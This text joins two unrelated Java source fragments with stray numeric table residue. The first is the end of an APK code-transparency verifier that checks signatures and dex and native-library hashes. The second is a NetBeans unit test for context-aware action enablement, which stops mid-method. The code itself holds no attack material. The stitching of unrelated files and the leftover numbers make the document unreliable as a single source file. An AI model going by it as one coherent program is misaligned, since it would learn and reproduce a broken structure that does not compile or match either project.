  /** Zip entry path inside the base APK where the signed code transparency file is stored. */
  private static final String TRANSPARENCY_FILE_ZIP_ENTRY_NAME =
      "META-INF/" + BundleMetadata.TRANSPARENCY_SIGNED_FILE_NAME;

  /**
   * Verifies code transparency for the given device-specific APKs.
   *
   * <p>Verification proceeds in stages, failing fast at each one: (1) the APK signatures are
   * verified; (2) the signed transparency file (JWS) is located in the base APK and its signature
   * is checked; (3) the transparency metadata version is checked; (4) every dex file and native
   * library in the APKs is hashed and compared against the metadata.
   *
   * @param deviceSpecificApks paths to the APKs; must contain either a single APK or a
   *     {@code base.apk} among multiple APKs
   * @return a {@link TransparencyCheckResult} describing which stages succeeded and, on failure,
   *     an error message
   * @throws InvalidCommandException if no base APK can be identified or the transparency file is
   *     missing from the APK
   * @throws UncheckedIOException if reading any of the APK files fails
   */
  public static TransparencyCheckResult checkTransparency(ImmutableList<Path> deviceSpecificApks) {
    Optional<Path> baseApkPath = getBaseApkPath(deviceSpecificApks);
    if (!baseApkPath.isPresent()) {
      throw InvalidCommandException.builder()
          .withInternalMessage(
              "The provided list of device specific APKs must either contain a single APK, or, if"
                  + " multiple APK files are present, base.apk file.")
          .build();
    }
    TransparencyCheckResult.Builder result = TransparencyCheckResult.builder();
    // Stage 1: all APKs must carry a valid signature before anything else is trusted.
    ApkSignatureVerifier.Result apkSignatureVerificationResult =
        ApkSignatureVerifier.verify(deviceSpecificApks);
    if (!apkSignatureVerificationResult.verified()) {
      return result
          .errorMessage("Verification failed: " + apkSignatureVerificationResult.getErrorMessage())
          .build();
    }
    result.apkSigningKeyCertificateFingerprint(
        apkSignatureVerificationResult.getApkSigningKeyCertificateFingerprint());
    try (ZipFile baseApkFile = ZipUtils.openZipFile(baseApkPath.get())) {
      // Stage 2: locate and verify the signed transparency file inside the base APK.
      Optional<ZipEntry> transparencyFileEntry =
          Optional.ofNullable(baseApkFile.getEntry(TRANSPARENCY_FILE_ZIP_ENTRY_NAME));
      if (!transparencyFileEntry.isPresent()) {
        throw InvalidCommandException.builder()
            .withInternalMessage(
                "Could not verify code transparency because transparency file is not present in the"
                    + " APK.")
            .build();
      }
      JsonWebSignature jws =
          CodeTransparencyCryptoUtils.parseJws(
              ZipUtils.asByteSource(baseApkFile, transparencyFileEntry.get()));
      boolean signatureVerified = CodeTransparencyCryptoUtils.verifySignature(jws);
      if (!signatureVerified) {
        return result
            .errorMessage("Verification failed because code transparency signature is invalid.")
            .build();
      }
      result
          .transparencySignatureVerified(true)
          .transparencyKeyCertificateFingerprint(
              CodeTransparencyCryptoUtils.getCertificateFingerprint(jws));
      // Stages 3 and 4: parse the (now signature-verified) payload, check its version, and
      // compare file hashes across all provided APKs.
      CodeTransparency codeTransparencyMetadata =
          CodeTransparencyFactory.parseFrom(jws.getUnverifiedPayload());
      CodeTransparencyVersion.checkVersion(codeTransparencyMetadata);
      ImmutableSet<String> pathsToModifiedFiles =
          getModifiedFiles(codeTransparencyMetadata, deviceSpecificApks);
      result.fileContentsVerified(pathsToModifiedFiles.isEmpty());
      if (!pathsToModifiedFiles.isEmpty()) {
        result.errorMessage(
            "Verification failed because code was modified after code transparency metadata"
                + " generation. Modified files: "
                + pathsToModifiedFiles);
      }
      return result.build();
    } catch (IOException e) {
      throw new UncheckedIOException("An error occurred when processing the file.", e);
    }
  }

  /**
   * Returns the path of the base APK among {@code apkPaths}, or empty if none can be identified.
   */
  private static Optional<Path> getBaseApkPath(ImmutableList<Path> apkPaths) {
    // If only 1 APK is present, it is assumed to be a universal or standalone APK.
    if (apkPaths.size() == 1) {
      return apkPaths.get(0).getFileName().toString().endsWith(".apk")
          ? Optional.of(apkPaths.get(0))
          : Optional.empty();
    }
    return apkPaths.stream()
        .filter(apkPath -> apkPath.getFileName().toString().equals("base.apk"))
        .findAny();
  }

  /**
   * Returns the entry names of all dex files and native libraries in {@code allApkPaths} whose
   * SHA-256 hashes do not match the expectations recorded in {@code codeTransparencyMetadata}.
   */
  private static ImmutableSet<String> getModifiedFiles(
      CodeTransparency codeTransparencyMetadata, ImmutableList<Path> allApkPaths) {
    ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
    for (Path apkPath : allApkPaths) {
      try (ZipFile apkFile = ZipUtils.openZipFile(apkPath)) {
        pathsToModifiedFilesBuilder.addAll(getModifiedDexFiles(apkFile, codeTransparencyMetadata));
        pathsToModifiedFilesBuilder.addAll(
            getModifiedNativeLibraries(apkFile, codeTransparencyMetadata));
      } catch (IOException e) {
        throw new UncheckedIOException(e);
      }
    }
    return pathsToModifiedFilesBuilder.build();
  }

  /**
   * Returns the names of dex entries in {@code apkFile} whose hash is not among the dex hashes in
   * the transparency metadata. Dex files are matched by content hash only, not by path.
   */
  private static ImmutableSet<String> getModifiedDexFiles(
      ZipFile apkFile, CodeTransparency codeTransparencyMetadata) {
    ImmutableSet<String> expectedDexFiles = getDexFiles(codeTransparencyMetadata);
    ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
    apkFile.stream()
        .forEach(
            zipEntry -> {
              String fileHash = getFileHash(apkFile, zipEntry);
              if (isDexFile(zipEntry) && !expectedDexFiles.contains(fileHash)) {
                pathsToModifiedFilesBuilder.add(zipEntry.getName());
              }
            });
    return pathsToModifiedFilesBuilder.build();
  }

  /**
   * Returns the names of native library entries in {@code apkFile} whose hash does not match the
   * hash recorded in the transparency metadata for the same APK path. Unlike dex files, native
   * libraries are matched per path.
   */
  private static ImmutableSet<String> getModifiedNativeLibraries(
      ZipFile apkFile, CodeTransparency codeTransparencyMetadata) {
    ImmutableMap<String, String> expectedNativeLibrariesByApkPath =
        getNativeLibrariesByApkPath(codeTransparencyMetadata);
    ImmutableSet.Builder<String> pathsToModifiedFilesBuilder = ImmutableSet.builder();
    apkFile.stream()
        .forEach(
            zipEntry -> {
              String fileHash = getFileHash(apkFile, zipEntry);
              if (isNativeLibrary(zipEntry)
                  && !Optional.ofNullable(expectedNativeLibrariesByApkPath.get(zipEntry.getName()))
                      .equals(Optional.of(fileHash))) {
                pathsToModifiedFilesBuilder.add(zipEntry.getName());
              }
            });
    return pathsToModifiedFilesBuilder.build();
  }

  /** Returns the SHA-256 hashes of all dex files recorded in the transparency metadata. */
  private static ImmutableSet<String> getDexFiles(CodeTransparency codeTransparency) {
    return codeTransparency.getCodeRelatedFileList().stream()
        .filter(ApkTransparencyCheckUtils::isDexFile)
        .map(CodeRelatedFile::getSha256)
        .collect(toImmutableSet());
  }

  /** Returns a map from APK path to expected SHA-256 hash for all recorded native libraries. */
  private static ImmutableMap<String, String> getNativeLibrariesByApkPath(
      CodeTransparency codeTransparency) {
    return codeTransparency.getCodeRelatedFileList().stream()
        .filter(
            codeRelatedFile ->
                codeRelatedFile.getType().equals(CodeRelatedFile.Type.NATIVE_LIBRARY))
        .collect(toImmutableMap(CodeRelatedFile::getApkPath, CodeRelatedFile::getSha256));
  }

  /** Returns true if the zip entry looks like a dex file, judging by its extension. */
  private static boolean isDexFile(ZipEntry zipEntry) {
    return zipEntry.getName().endsWith(".dex");
  }

  /** Returns true if the metadata entry describes a dex file. */
  private static boolean isDexFile(CodeRelatedFile codeRelatedFile) {
    return codeRelatedFile.getType().equals(CodeRelatedFile.Type.DEX)
        // Code transparency files generated using Bundletool with version older than
        // 1.8.1 do not have type field set for dex files.
        || (codeRelatedFile.getType().equals(CodeRelatedFile.Type.TYPE_UNSPECIFIED)
            && codeRelatedFile.getPath().endsWith(".dex"));
  }

  /** Returns true if the zip entry looks like a native library, judging by its extension. */
  private static boolean isNativeLibrary(ZipEntry zipEntry) {
    return zipEntry.getName().endsWith(".so");
  }

  /** Computes the SHA-256 hash (hex string) of the given zip entry's contents. */
  private static String getFileHash(ZipFile apkFile, ZipEntry zipEntry) {
    try {
      return ZipUtils.asByteSource(apkFile, zipEntry).hash(Hashing.sha256()).toString();
    } catch (IOException e) {
      throw new UncheckedIOException(e);
    }
  }

  // Utility class: not meant to be instantiated.
  private ApkTransparencyCheckUtils() {}
}
| 3,320 |
988 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.openide.awt;
import java.awt.EventQueue;
import java.awt.event.ActionEvent;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.beans.PropertyChangeSupport;
import java.lang.ref.WeakReference;
import java.lang.reflect.InvocationTargetException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.ActionMap;
import org.netbeans.junit.NbTestCase;
import org.openide.filesystems.FileObject;
import org.openide.filesystems.FileUtil;
import org.openide.util.ContextAwareAction;
import org.openide.util.ContextGlobalProvider;
import org.openide.util.Lookup;
import org.openide.util.Utilities;
import org.openide.util.lookup.AbstractLookup;
import org.openide.util.lookup.InstanceContent;
import org.openide.util.lookup.Lookups;
import org.openide.util.lookup.ProxyLookup;
import org.openide.util.test.MockLookup;
/** Test that cookie actions are in fact sensitive to the correct cookies in the
* correct numbers, and that changes to either node selection or cookies on the
* selected nodes trigger a change in the selected state.
* @author <NAME>
*/
public class ContextActionTest extends NbTestCase
implements Lookup.Provider, ContextActionEnabler<ContextActionTest.Openable> {
public ContextActionTest(String name) {
super(name);
}
private Lookup lookup;
private Lookup lookupProxy;
private ContextAwareAction a1, a2, any, each, all;
private LookupWithOpenable n1, n2;
private Lookup n3, n4;
private int expectedEnabledmentCount = 2;
private static class CGP implements ContextGlobalProvider, Lookup.Provider {
private final Lookup prx = Lookups.proxy(this);
volatile Lookup current;
@Override
public Lookup createGlobalContext() {
return prx;
}
@Override
public Lookup getLookup() {
Lookup c = current;
return c != null ? c : Lookup.EMPTY;
}
}
static CGP actionLookup = new CGP();
@Override
protected void setUp() throws Exception {
lookup = Lookup.EMPTY;
lookupProxy = Lookups.proxy(this);
a1 = context(new SimpleCookieAction(), null, ContextSelection.EXACTLY_ONE, lookupProxy, Openable.class);
a2 = context(new SimpleCookieAction(), this, ContextSelection.ANY, lookupProxy, Openable.class);
any = context(new SimpleCookieAction(), null, ContextSelection.ANY, lookupProxy, Openable.class);
each = context(new SimpleCookieAction(), null, ContextSelection.EACH, lookupProxy, Openable.class);
all = context(new SimpleCookieAction(), null, ContextSelection.ALL, lookupProxy, Openable.class);
n1 = new LookupWithOpenable();
n2 = new LookupWithOpenable();
n3 = new LookupWithOpenable(false);
n4 = new LookupWithOpenable(n1.lookup(Openable.class)); // share the same cookie instance with n1
SimpleCookieAction.runOn.clear();
actionLookup.current = lookupProxy;
MockLookup.setLookup(Lookups.metaInfServices(getClass().getClassLoader()),
lookupProxy,
Lookups.fixed(actionLookup));
}
@Override
protected void tearDown() throws Exception {
actionLookup.current = null;
super.tearDown();
}
@Override
protected boolean runInEQ() {
return true;
}
public void testFilterOutDuplicates() throws Exception {
// Check enablement logic.
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
a1.addPropertyChangeListener(l);
assertFalse(getIsEnabled(a1));
final int[] cnt = { 0 };
class O implements Openable {
@Override
public void open() {
cnt[0]++;
}
}
O o = new O();
activate(Lookups.fixed(o, o));
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
doActionPerformed(a1, new ActionEvent(this, 0, ""));
assertEquals("One invocation", 1, cnt[0]);
}
/** Similar to NodeActionTest. */
public void testBasicUsage() throws Exception {
// Check enablement logic.
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
a1.addPropertyChangeListener(l);
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1, n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n2});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n3});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n3});
assertFalse(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertFalse("No change", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1, n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1, n4});
assertTrue("Change generated as we are now enabled", l.changed());
l.gotit = 0;
assertTrue("Open in n1 and n4 is the same, still gets enabled", getIsEnabled(a1));
}
// XXX test advanced cookie modes, multiple cookies, etc.:
// all combinations of one cookie class vs. two, and any
// disjunctions of MODE_* constants, against any combination
// of nodes {n1, n2, n3} (first add a different cookie to n3 and also to n2)
/** Make sure it works to change the cookies on a selected node. */
public void testChangeCookiesOnNodes() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
assertFalse(getIsEnabled(a1));
assertTrue(n1.lookup(Openable.class) != null);
a1.addPropertyChangeListener(l);
activate(new Lookup[] {n1});
assertTrue("Received PROP_ENABLED on SimpleCookieAction after changing nodes", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
n1.setHasCookie(false);
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate();
assertFalse("No change in enablement", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(n1);
n1.setHasCookie(true);
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
n2.setHasCookie(false);
activate(new Lookup[] {n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
n2.setHasCookie(true);
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
a1.removePropertyChangeListener(l);
assertTrue(getIsEnabled(a1));
n2.setHasCookie(false);
assertFalse(getIsEnabled(a1));
n2.setHasCookie(true);
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(getIsEnabled(a1));
assertTrue(getIsEnabled(a1));
n1.setHasCookie(false);
assertFalse(getIsEnabled(a1));
}
//
// cloneAction support
//
public void testNodeActionIsCorrectlyClonned() throws Exception {
class Counter implements PropertyChangeListener {
int cnt;
public void propertyChange(PropertyChangeEvent ev) {
cnt++;
}
public void assertCnt(String txt, int cnt) {
assertEquals(txt, cnt, this.cnt);
this.cnt = 0;
}
}
Counter counter = new Counter();
LookupWithOpenable node = new LookupWithOpenable();
node.setHasCookie(false);
Action clone = a1.createContextAwareInstance(node);
clone.addPropertyChangeListener(counter);
assertTrue("Not enabled", !getIsEnabled(clone));
node.setHasCookie(true);
assertTrue("Enabled", getIsEnabled(clone));
counter.assertCnt("Once change in enabled state", 1);
doActionPerformed(clone, new ActionEvent(this, 0, ""));
assertEquals("Has been executed just once: ", 1, SimpleCookieAction.runOn.size());
Collection c = (Collection)SimpleCookieAction.runOn.iterator().next();
SimpleCookieAction.runOn.clear();
assertTrue("Has been executed on mn1", c.contains(node.lookup(Openable.class)));
node.setHasCookie(false);
assertTrue("Not enabled", !getIsEnabled(clone));
counter.assertCnt("One change", 1);
WeakReference<?> w = new WeakReference<Object>(clone);
clone = null;
assertGC("Clone can disappear", w);
}
public void testSelectModeAnyBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
any.addPropertyChangeListener(l);
assertFalse(getIsEnabled(any));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(any));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(any));
n2.setHasCookie(false);
assertTrue(getIsEnabled(any));
assertFalse("No change, still on", l.changed());
n1.setHasCookie(false);
assertTrue(l.changed());
l.gotit = 0;
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(any));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(any));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(any));
}
public void testSelectModeEachBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
each.addPropertyChangeListener(l);
assertFalse(getIsEnabled(each));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(each));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(each));
n2.setHasCookie(false);
assertFalse("No longer enabled, we need all", getIsEnabled(each));
assertTrue("The change is on", l.changed());
l.gotit = 0;
n1.setHasCookie(false);
assertFalse("No change now", l.changed());
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(each));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(each));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(each));
class O implements Openable {
public int cnt;
public void open() {
cnt++;
}
}
O o = new O();
n2.setHasCookie(true);
n2.ic.add(o);
activate(n2, n3);
assertTrue("Going to disabled state", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(each));
activate(n2);
assertFalse("No change, probably", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(each));
n2.ic.remove(o);
assertTrue("Enabled again", l.changed());
l.gotit = 0;
assertTrue("On", getIsEnabled(each));
}
public void testSelectModeAllBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
all.addPropertyChangeListener(l);
assertFalse(getIsEnabled(all));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(all));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(all));
n2.setHasCookie(false);
assertFalse("No longer enabled, we need all", getIsEnabled(all));
assertTrue("The change is on", l.changed());
l.gotit = 0;
n1.setHasCookie(false);
assertFalse("No change now", l.changed());
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(all));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(all));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(all));
class O implements Openable {
public int cnt;
public void open() {
cnt++;
}
}
O o = new O();
n2.setHasCookie(true);
n2.ic.add(o);
activate(n2, n3);
assertTrue("Going to disabled state", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(all));
activate(n2);
assertTrue("No change, probably", l.changed());
l.gotit = 0;
assertTrue("Enabled as one node can have more cookies", getIsEnabled(all));
n2.ic.remove(o);
assertFalse("No change", l.changed());
l.gotit = 0;
assertTrue("Still On", getIsEnabled(all));
}
public void testContextXMLDefinition() throws Exception {
FileObject folder;
folder = FileUtil.getConfigFile("actions/support/test");
assertNotNull("testing layer is loaded: ", folder);
FileObject fo = folder.getFileObject("testContext.instance");
Object obj = fo.getAttribute("instanceCreate");
if (!(obj instanceof ContextAwareAction)) {
fail("Shall create an action: " + obj);
}
ContextAwareAction caa = (ContextAwareAction)obj;
Action action = caa.createContextAwareInstance(lookupProxy);
assertEquals("Both actions are equal", action, caa);
assertEquals("and have the same hash", action.hashCode(), caa.hashCode());
class SimpleAction extends AbstractAction {
public int cnt;
public void actionPerformed(ActionEvent e) {
cnt++;
}
}
SimpleAction simpleAction = new SimpleAction();
ActionMap map = new ActionMap();
LookupWithOpenable openLookup = new LookupWithOpenable();
activate(openLookup);
assertTrue("Our action is enabled", this.getIsEnabled(action));
openLookup.setHasCookie(false);
assertFalse("Our action is not enabled", this.getIsEnabled(action));
activate(openLookup, Lookups.singleton(map));
assertFalse("Still disabled", this.getIsEnabled(action));
map.put("contextKey", simpleAction);
assertTrue("Now enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("simple action invoked", 1, simpleAction.cnt);
openLookup.setHasCookie(true);
assertTrue("Still enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("simple action invoked again", 2, simpleAction.cnt);
activate(openLookup, Lookups.singleton(new ActionMap()));
assertTrue("Yet enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("Our SimpleCookieAction invoked", 1, SimpleCookieAction.runOn.size());
List<? extends Openable> open = SimpleCookieAction.runOn.get(0);
assertEquals("Our SimpleCookieAction invoked", 1, open.size());
assertSame("the right instance", openLookup.lookup(Openable.class), open.get(0));
String n = (String)action.getValue(Action.NAME);
assertEquals("Open", n);
}
    /**
     * Checks an action declared in the XML layer without a "key" attribute:
     * such an action must ignore the ActionMap found in the context entirely
     * and always delegate to its fallback performer (SimpleCookieAction).
     */
    public void testContextXMLDefinitionNoKey() throws Exception {
        FileObject folder;
        folder = FileUtil.getConfigFile("actions/support/test");
        assertNotNull("testing layer is loaded: ", folder);
        FileObject fo = folder.getFileObject("testContextNoKey.instance");
        Object obj = fo.getAttribute("instanceCreate");
        if (!(obj instanceof ContextAwareAction)) {
            fail("Shall create an action: " + obj);
        }
        ContextAwareAction caa = (ContextAwareAction)obj;
        Action action = caa.createContextAwareInstance(lookupProxy);
        // the context-aware clone must compare equal to the declared action
        assertEquals("Both actions are equal", action, caa);
        assertEquals("and have the same hash", action.hashCode(), caa.hashCode());
        // local helper action that counts its own invocations
        class SimpleAction extends AbstractAction {
            public int cnt;
            public void actionPerformed(ActionEvent e) {
                cnt++;
            }
        }
        SimpleAction simpleAction = new SimpleAction();
        ActionMap map = new ActionMap();
        LookupWithOpenable openLookup = new LookupWithOpenable();
        activate(openLookup);
        assertTrue("Our action is enabled", this.getIsEnabled(action));
        openLookup.setHasCookie(false);
        assertFalse("Our action is not enabled", this.getIsEnabled(action));
        activate(openLookup, Lookups.singleton(map));
        assertFalse("Still disabled", this.getIsEnabled(action));
        // putting the key into the ActionMap must have no effect here,
        // because this layer definition declares no key at all
        map.put("contextKey", simpleAction);
        assertFalse("Action does not react to any key", this.getIsEnabled(action));
        openLookup.setHasCookie(true);
        assertTrue("Still enabled", this.getIsEnabled(action));
        doActionPerformed(action, new ActionEvent(this, 0, ""));
        assertEquals("no meaning in simple action", 0, simpleAction.cnt);
        assertEquals("Our SimpleCookieAction invoked", 1, SimpleCookieAction.runOn.size());
        List<? extends Openable> open = SimpleCookieAction.runOn.get(0);
        assertEquals("Our SimpleCookieAction invoked", 1, open.size());
        assertSame("the right instance", openLookup.lookup(Openable.class), open.get(0));
        String n = (String)action.getValue(Action.NAME);
        assertEquals("Open", n);
    }
    /**
     * Runs the shared enabler scenario and then verifies that changing the
     * expected selection count and re-querying the "enabler" property makes
     * the action recompute (and drop) its enabled state even though the
     * lookup contents did not change.
     */
    public void testBasicUsageWithEnabler() throws Exception {
        ActionsInfraHid.WaitPCL l = doBasicUsageWithEnabler(a2);
        expectedEnabledmentCount = 1;
        // api to rescan the enablement state
        try {
            a2.getValue("enabler");
        } catch (AssertionError err) {
            if (!EventQueue.isDispatchThread()) {
                // ok, it is expected that the "enabler" API can be invoked
                // only from AWT thread, for now
                return;
            }
        }
        assertTrue("change in the enabled state", l.changed());
        l.gotit = 0;
        assertFalse("no longer enabled, even no change in lookup happened", getIsEnabled(a2));
    }
    /**
     * Same enabler scenario as {@link #testBasicUsageWithEnabler}, but with
     * the action instantiated from its XML layer declaration instead of
     * being created programmatically.
     */
    public void testBasicUsageWithEnablerFromLayer() throws Exception {
        FileObject folder;
        folder = FileUtil.getConfigFile("actions/support/test");
        assertNotNull("testing layer is loaded: ", folder);
        FileObject fo = folder.getFileObject("testContextEnabler.instance");
        Object obj = fo.getAttribute("instanceCreate");
        if (!(obj instanceof ContextAwareAction)) {
            fail("Shall create an action: " + obj);
        }
        ContextAwareAction caa = (ContextAwareAction)obj;
        Action action = caa.createContextAwareInstance(lookupProxy);
        doBasicUsageWithEnabler(action);
    }
    /** Icon resource referenced from the testing layer definitions. */
    static URL myIconResource() {
        return ContextAwareAction.class.getResource("TestIcon.png");
    }
    /**
     * Shared scenario for enabler-driven actions: the action must become
     * enabled only while the context holds the expected number of Openables
     * (two, judging by the assertions below - driven by {@link #enabled}).
     *
     * @param operateOn the action instance under test
     * @return the property change listener attached to the action, so the
     *         caller can continue asserting on further state changes
     */
    private ActionsInfraHid.WaitPCL doBasicUsageWithEnabler(Action operateOn) throws Exception {
        // Check enablement logic.
        ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
        operateOn.addPropertyChangeListener(l);
        assertFalse(getIsEnabled(operateOn));
        activate(new Lookup[] {n1});
        assertFalse("We need two nodes to become enabled", l.changed());
        l.gotit = 0;
        assertFalse("and there is just one", getIsEnabled(operateOn));
        activate(new Lookup[] {n1, n2});
        assertTrue("Ok, now we are enabled", l.changed());
        l.gotit = 0;
        assertTrue("Yes", getIsEnabled(operateOn));
        activate(new Lookup[] {n2});
        assertTrue("Disabled again", l.changed());
        l.gotit = 0;
        assertFalse("Disabled", getIsEnabled(operateOn));
        activate(new Lookup[] {n3});
        assertFalse(l.changed());
        l.gotit = 0;
        assertFalse(getIsEnabled(operateOn));
        activate(new Lookup[] {n3});
        assertFalse("Again not changed", l.changed());
        l.gotit = 0;
        assertFalse(getIsEnabled(operateOn));
        activate(new Lookup[] {n1});
        assertFalse(l.changed());
        l.gotit = 0;
        assertFalse(getIsEnabled(operateOn));
        activate(new Lookup[] {n1});
        assertFalse("No change", l.changed());
        l.gotit = 0;
        assertFalse(getIsEnabled(operateOn));
        activate(new Lookup[] {n1, n2});
        assertTrue("now there is enabledment", l.changed());
        l.gotit = 0;
        assertTrue(getIsEnabled(operateOn));
        return l;
    }
    /** Lookup.Provider implementation - exposes the currently activated lookup. */
    public Lookup getLookup() {
        return lookup;
    }
private void activate(Lookup... lkps) {
if (lkps.length == 1) {
lookup = lkps[0];
} else if (lkps.length == 0) {
lookup = Lookup.EMPTY;
} else {
lookup = new ProxyLookup(lkps);
}
// refresh
lookupProxy.lookup(Object.class);
}
    /** Reads the enabled state of the action; must be called from the AWT thread. */
    protected boolean getIsEnabled(final Action a1) throws InterruptedException, InvocationTargetException {
        assertTrue("In AWT", EventQueue.isDispatchThread());
        return a1.isEnabled();
    }
    /** Reads the checked ({@code Action.SELECTED_KEY}) state; AWT thread only. */
    protected boolean getIsChecked(final Action a1) throws InterruptedException, InvocationTargetException {
        assertTrue("In AWT", EventQueue.isDispatchThread());
        return Boolean.TRUE.equals(a1.getValue(Action.SELECTED_KEY));
    }
    /** Invokes the action with the given event; must be called from the AWT thread. */
    protected void doActionPerformed(final Action a1, final ActionEvent ev) throws InterruptedException, InvocationTargetException {
        assertTrue("In AWT", EventQueue.isDispatchThread());
        a1.actionPerformed(ev);
    }
public boolean enabled(List<? extends Openable> data) {
return data.size() == expectedEnabledmentCount;
}
    /** Factory referenced from the layer; a fresh test instance acts as the enabler. */
    static ContextActionEnabler<?> getEnabler() {
        return new ContextActionTest("");
    }
    /**
     * Creates a context aware action that delegates to the given performer
     * and enabler, over instances of type {@code c} selected by {@code s}.
     */
    private static <T> ContextAwareAction context(
        ContextActionPerformer<T> a, ContextActionEnabler<T> e, ContextSelection s, Lookup lookupProxy, Class<T> c
    ) {
        ContextAction.Performer<T> perf = new ContextAction.Performer<T>(a, e);
        return GeneralAction.context(perf, s, lookupProxy, c);
    }
    /** Test cookie interface looked up from the context by the actions under test. */
    public static interface Openable {
        public void open();
    }
    /**
     * Fallback performer: opens every Openable it is invoked on and records
     * each invocation batch in the static {@link #runOn} list for assertions.
     */
    public static class SimpleCookieAction implements ContextActionPerformer<Openable> {
        public void actionPerformed(ActionEvent ev, List<? extends Openable> toOpen) {
            runOn.add(toOpen);
            for (Openable o : toOpen) {
                o.open();
            }
        }
        // shared across tests; NOTE(review): assumes it is cleared between runs - confirm in setUp
        public static final List<List<? extends Openable>> runOn = new ArrayList<List<? extends Openable>>();
    }
    /**
     * Lookup whose Openable content can be toggled on and off, used to
     * simulate selection changes. The lookup also contains itself, so it
     * can be found as a Lookup.Provider.
     */
    private static final class LookupWithOpenable extends AbstractLookup
    implements Lookup.Provider {
        private InstanceContent ic;
        /** Trivial Openable implementation with no behavior. */
        private static final class Open implements Openable {
            public void open() {
                // do nothing
            }
        }
        public LookupWithOpenable() {
            this(true);
        }
        public LookupWithOpenable(boolean add) {
            this(new InstanceContent(), add ? new Open() : null);
        }
        public LookupWithOpenable(Openable open) {
            this(new InstanceContent(), open);
        }
        private LookupWithOpenable(InstanceContent ic, Openable open) {
            super(ic);
            this.ic = ic;
            if (open != null) {
                ic.add(open);
            }
            // make this lookup discoverable as a Lookup.Provider as well
            ic.add(this);
        }
        /** Adds or removes the Openable cookie from the lookup content. */
        public void setHasCookie(boolean b) {
